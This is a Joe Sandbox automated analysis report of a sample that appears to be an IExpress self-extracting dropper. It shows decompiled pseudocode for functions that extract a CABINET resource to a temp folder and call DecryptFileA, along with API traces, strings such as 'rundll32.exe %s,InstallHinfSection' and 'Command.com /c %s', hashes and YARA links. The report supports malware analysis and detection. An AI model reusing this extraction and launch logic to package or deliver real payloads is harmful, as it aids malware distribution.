Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-472070384
Opcode ID: 1ff9f46a2852f98c2c272c8593e12c6b2783f671e7e8687257f8a19babb4ada0
Instruction ID: c0326c435d79f0722cc9ec6f4e301907e5a74102754144db2ddb01e6774121ab
Opcode Fuzzy Hash: 1ff9f46a2852f98c2c272c8593e12c6b2783f671e7e8687257f8a19babb4ada0
Instruction Fuzzy Hash: 0DA157B0A083186BEB309B64CC45BEA77ADEB92314F144695F595E32F0DBB09E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0093597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0093597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x938004; // 0x911e09f9
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x939124 = E00936285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E009344B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x939a34 & 0x00000008;
							if(( *0x939a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x939a38; // 0x0
								_t110 =  *((intOrPtr*)(0x9389e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x939124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0093268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x939a38; // 0x0
							_t110 =  *((intOrPtr*)(0x9389e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x9389e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x939a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E009344B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x939124 = E00936285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E009344B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x939124 = E00936285();
					_t66 = 0;
					L33:
					return E00936CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x0093597d
0x00935988
0x0093598f
0x0093599a
0x009359a6
0x009359a8
0x009359af
0x009359b9
0x009359dd
0x009359e4
0x009359f1
0x009359fe
0x00935a0b
0x00935a13
0x00935a19
0x00935a1b
0x00935ba1
0x00935baf
0x00935bbd
0x00935bd8
0x00935bde
0x00935be3
0x00935bec
0x00935bf0
0x00935bfc
0x00935c02
0x00935c02
0x00935c02
0x00935c04
0x00935c04
0x00000000
0x00935c04
0x00935a27
0x00935a3a
0x00935a46
0x00935a48
0x00935a4a
0x00000000
0x00000000
0x00935a64
0x00935a6a
0x00935a6c
0x00935abc
0x00935ac2
0x00935ac9
0x00935aca
0x00935aca
0x00935acc
0x00935acc
0x00935acf
0x00935ad1
0x00000000
0x00000000
0x00935ad3
0x00935ad6
0x00935ad8
0x00000000
0x00000000
0x00935ada
0x00935adc
0x00935add
0x00935add
0x00935ae0
0x00000000
0x00000000
0x00000000
0x00935ae0
0x00935ae2
0x00935ae4
0x00935ae6
0x00935ae6
0x00935ae6
0x00935ae9
0x00935aeb
0x00935af0
0x00935af6
0x00935af8
0x00935af9
0x00935af9
0x00935afb
0x00000000
0x00000000
0x00935afd
0x00935aff
0x00935b00
0x00935b03
0x00000000
0x00000000
0x00000000
0x00935b03
0x00935b05
0x00935b08
0x00935b20
0x00935b27
0x00935b52
0x00935b52
0x00935b5b
0x00935b62
0x00935b6b
0x00935b6d
0x00935b76
0x00935b7d
0x00935b83
0x00935b7f
0x00935b7f
0x00935b7f
0x00935b6f
0x00935b72
0x00935b72
0x00935b85
0x00935b98
0x00935b9e
0x00935b87
0x00935b8f
0x00935b8f
0x00000000
0x00935b85
0x00935b29
0x00935b33
0x00000000
0x00000000
0x00935b35
0x00935b48
0x00935b4a
0x00000000
0x00935b4a
0x00935b0f
0x00935b16
0x00000000
0x00935b16
0x00935a7c
0x00935a8a
0x00935aa5
0x00935aab
0x00000000
0x009359bb
0x009359c0
0x009359c7
0x009359d1
0x009359d6
0x00935c05
0x00935c14
0x00935c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 009359A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 009359AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00935A13
MulDiv.KERNEL32(?,?,00000400), ref: 00935A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00935A64
memset.MSVCRT ref: 00935A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00935A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00935AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00935BFC

Part of subcall function 009344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00934518
Part of subcall function 009344B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00934554

Part of subcall function 00936285: GetLastError.KERNEL32(00935BBC), ref: 00936285

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: 660b51b1f404f077fbd56613f09da48395f1d27bd0def7165ccb193d38c3a838
Instruction ID: af174ca95a80defa7efa91f62e48931d51a79cfbf6505c96b09870a5bc0af709
Opcode Fuzzy Hash: 660b51b1f404f077fbd56613f09da48395f1d27bd0def7165ccb193d38c3a838
Instruction Fuzzy Hash: 947190B191420CAFEB259B60CC89FFBB7BCEB4C344F1545A9F485D6140EA749E849F60

Uniqueness

Uniqueness Score: -1.00%

Function 00934FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00934FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x939144 = E0093468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x939140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x938584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x938584, 0x841), 5);
				}
				_t10 = E00934EFD(0, 0);
				if(_t10 != 0) {
					__imp__#20(E00934CA0, E00934CC0, E00934980, E00934A50, E00934AD0, E00934B60, E00934BC0, 1, 0x939148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x939148; // 0x0
						_t24 =  *0x938584; // 0x0
						E009344B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x931140, 0, E00934CD0, 0, 0x939140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x938584; // 0x0
					E009344B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x939140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x939140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x9391d8; // 0x0
						if(_t47 == 0) {
							E009344B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x938a38 & 0x00000001) == 0 && ( *0x939a34 & 0x00000001) == 0) {
						SendMessageA( *0x938584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x00934fe0
0x00934fe6
0x00934ff9
0x0093500d
0x00935013
0x0093501a
0x00935163
0x00935163
0x00935020
0x00935027
0x00935037
0x00935051
0x00935051
0x00935057
0x0093505e
0x009350a7
0x009350ad
0x009350b4
0x009350e8
0x009350e8
0x009350ee
0x009350ff
0x00935104
0x00935106
0x00000000
0x00935106
0x009350cd
0x009350d3
0x009350da
0x00000000
0x00000000
0x009350dd
0x009350e6
0x00000000
0x00000000
0x00000000
0x00935060
0x00935060
0x00935070
0x00935075
0x00935107
0x00935107
0x0093510e
0x00935111
0x00935117
0x00935117
0x0093511f
0x00935121
0x00935127
0x00935135
0x00935135
0x00935127
0x00935141
0x00935159
0x00935159
0x00000000
0x0093515f

APIs

Part of subcall function 0093468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346A0
Part of subcall function 0093468F: SizeofResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346A9
Part of subcall function 0093468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346C3
Part of subcall function 0093468F: LoadResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346CC
Part of subcall function 0093468F: LockResource.KERNEL32(00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346D3
Part of subcall function 0093468F: memcpy_s.MSVCRT ref: 009346E5
Part of subcall function 0093468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009346EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00934FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00935006
LockResource.KERNEL32(00000000), ref: 0093500D
GetDlgItem.USER32(00000000,00000842), ref: 00935030
ShowWindow.USER32(00000000), ref: 00935037
GetDlgItem.USER32(00000841,00000005), ref: 0093504A
ShowWindow.USER32(00000000), ref: 00935051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00935111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00935159

Strings

*MEMCAB, xrefs: 009350C7
CABINET, xrefs: 00934FE6, 00934FF7

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 9b7ac392dec6428e92c4df4615535e629381e3945a7b71aff8f1b61256fd1c44
Instruction ID: f08972ace484239abdb6f49853102d22e5a31bb9bf3371a4239570b8ecec90fd
Opcode Fuzzy Hash: 9b7ac392dec6428e92c4df4615535e629381e3945a7b71aff8f1b61256fd1c44
Instruction Fuzzy Hash: B83105B075C7027FE7205BE1AD8EF6736ACA789B49F060024F941E21A1DBF5DC00AE65

Uniqueness

Uniqueness Score: -1.00%

Function 00932F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00932F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x938004; // 0x911e09f9
				_v8 = _t9 ^ _t46;
				if( *0x938a38 != 0) {
					L5:
					_t11 = E00935164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00936CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E009355A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0093658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x93a288("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x938a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x938a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x938d48 & 0x000000c0;
									if(( *0x938d48 & 0x000000c0) == 0) {
										_t41 =  *0x939a40; // 0x3, executed
										_t26 = E0093256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x938a24; // 0x0
									 *0x939a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x938a38;
										if( *0x938a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00934169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x939a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00933BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x938a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00933B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E009344B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x939124 = E00936285();
							goto L16;
						}
						_t59 =  *0x939a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0093621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x938a24;
				if( *0x938a24 != 0) {
					L4:
					_t34 = E00933A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E009351E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x938a38;
				if( *0x938a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x00932f1d
0x00932f28
0x00932f2f
0x00932f3d
0x00932f6c
0x00932f6c
0x00932f71
0x00932f73
0x00933041
0x00933041
0x00933043
0x00933053
0x00933053
0x00932f79
0x00932f80
0x00000000
0x00932f86
0x00932f86
0x00932f93
0x00932f9e
0x00932fa0
0x00932fa6
0x00932fb8
0x00932fba
0x00932fbe
0x00932fc6
0x00932fcc
0x00932fd4
0x00932fd6
0x00932fd8
0x00932fe0
0x00932fe6
0x00932fee
0x00932ff0
0x00932ff5
0x00932ff5
0x00932fee
0x00932fd4
0x00932ff8
0x00932ffe
0x00933004
0x00933017
0x0093301c
0x00933024
0x00933054
0x0093305a
0x00933065
0x00933065
0x0093306c
0x0093306e
0x00933075
0x0093307a
0x0093307a
0x0093307c
0x00933081
0x00933087
0x00933089
0x009330a1
0x009330a1
0x009330a9
0x009330ab
0x009330ad
0x009330af
0x009330af
0x009330ad
0x009330b6
0x00000000
0x0093308b
0x0093308b
0x00933091
0x00000000
0x00000000
0x00933093
0x00933098
0x0093309a
0x00000000
0x00000000
0x0093309c
0x00000000
0x0093309c
0x00933089
0x0093305c
0x00933061
0x00933063
0x00000000
0x00000000
0x00000000
0x00933063
0x0093302b
0x00933032
0x0093303c
0x00000000
0x0093303c
0x00933006
0x0093300c
0x00000000
0x00000000
0x0093300e
0x00933015
0x00000000
0x00000000
0x00000000
0x00933015
0x00932f80
0x00932f3f
0x00932f46
0x00932f5f
0x00932f5f
0x00932f64
0x00932f66
0x00000000
0x00000000
0x00000000
0x00932f66
0x00932f4f
0x00000000
0x00000000
0x00932f55
0x00932f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 00932F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00932FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00932FC6
DecryptFileA.ADVAPI32 ref: 00932FE6
FreeLibrary.KERNEL32(00000000), ref: 00932FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0093301C

Part of subcall function 009351E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00932F4D,?,00000002,00000000), ref: 00935201

Strings

advapi32.dll, xrefs: 00932F99
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00932FDB, 00933017
DecryptFileA, xrefs: 00932FC0

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-3123416969
Opcode ID: 128bcfddfd74ea0a185cb0e47e95daa1932474dec69cac0c58c253187404e2f4
Instruction ID: 8afb1aba4cdba09faccf6d8eaffc60c2f521c4b8e6e24618581cb8d02f48ecd6
Opcode Fuzzy Hash: 128bcfddfd74ea0a185cb0e47e95daa1932474dec69cac0c58c253187404e2f4
Instruction Fuzzy Hash: 0A41D130A643059ADB38AB72ED4976B33ECDB85750F008125F981C2191EFB4CE80EE61

Uniqueness

Uniqueness Score: -1.00%

Function 00935467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00935467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x938004; // 0x911e09f9
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x9391e4;
					_t42 = 0x104;
					E00931680(0x9391e4, 0x104);
					L14:
					_t13 = E009358C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x939124 = 0;
							_t14 = 1;
							L24:
							return E00936CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0093597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x938a20; // 0x0
						if(_t61 != 0) {
							 *0x938a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x939124 = E00936285();
						goto L22;
					}
					 *0x938a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E009353A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x9391e4;
				E00931781(0x9391e4, 0x104, __ecx,  &_v268);
				if(( *0x939a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0093658A(_t48, 0x104, 0x931140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0093658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x00935472
0x00935479
0x00935481
0x00935484
0x0093551c
0x00935521
0x00935528
0x0093552d
0x0093552f
0x00935539
0x0093554d
0x0093554d
0x00935552
0x00935585
0x00935585
0x0093558b
0x0093558d
0x0093559d
0x0093559d
0x00935557
0x0093555e
0x00000000
0x00000000
0x00935560
0x00935566
0x00935569
0x0093556f
0x0093556f
0x00935581
0x00935581
0x00000000
0x00935581
0x00935545
0x0093557c
0x00000000
0x0093557c
0x00935547
0x00000000
0x00935547
0x0093548a
0x00935490
0x00935497
0x00000000
0x00000000
0x0093549d
0x009354ab
0x009354b4
0x009354c0
0x0093550c
0x00935511
0x00935515
0x00000000
0x00935515
0x009354c9
0x009354d6
0x009354d8
0x009354fe
0x00935503
0x00935507
0x00000000
0x00935507
0x009354da
0x009354dd
0x009354f7
0x00000000
0x009354f7
0x009354df
0x009354e2
0x009354f0
0x00000000
0x009354f0
0x009354e7
0x00000000
0x00000000
0x009354e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 009354C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0093553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0093556F

Part of subcall function 009353A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 009353FB
Part of subcall function 009353A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00935402
Part of subcall function 009353A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0093541F
Part of subcall function 009353A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0093542B
Part of subcall function 009353A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00935434

Strings

ppc, xrefs: 009354E9
alpha, xrefs: 009354F0
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 0093547D, 00935481, 009354AB, 0093551C, 0093553C, 00935568
mips, xrefs: 009354F7
i386, xrefs: 009354FE

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-3703068183
Opcode ID: 9cacb46819f1ee46d07f303c6546981b296e55510eb3f30255bf3a04f10bf2fc
Instruction ID: 3d04588b6cf9f07b471bb831347484bf3de1df9d36b729ff78333ab3532c02aa
Opcode Fuzzy Hash: 9cacb46819f1ee46d07f303c6546981b296e55510eb3f30255bf3a04f10bf2fc
Instruction Fuzzy Hash: 7B312771B14B006BCB149F699C45B7F779FABDA304F06012AF442D3160DB74DE019E91

Uniqueness

Uniqueness Score: -1.00%

Function 00932390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
